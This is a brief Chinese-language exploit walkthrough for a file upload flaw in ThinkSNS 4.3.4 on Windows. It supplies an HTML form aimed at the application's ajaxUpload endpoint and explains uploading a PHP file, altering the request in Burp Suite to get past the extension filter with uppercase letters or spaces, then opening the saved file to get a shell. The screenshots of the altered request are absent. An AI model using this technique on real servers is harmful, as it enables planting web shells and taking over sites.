这个漏洞只能在windows下使用,因为Linux下的后缀名很严格,所以不能用大写以及加空格来绕过。
先构造一个上传表单:

<html><body>

<form action="http://localhost/thinksns434/index.php?app=public&mod=attach&act=ajaxUpload" method="post" 

enctype="multipart/form-data">

<label for="file">Filename:</label>

<input type="file" name="upfile" id="file" /> <br /><input type="submit" name="submit" value="Submit" /></form>

</body>

</html>

然后呢,随便选择一个php文件,开始上传,同时打开Burpsuite开始抓包改包,其中要更改的地方如下:

然后就可以看到回显了上传文件的保存位置了,如图:

我们试着访问一下,成功getshell: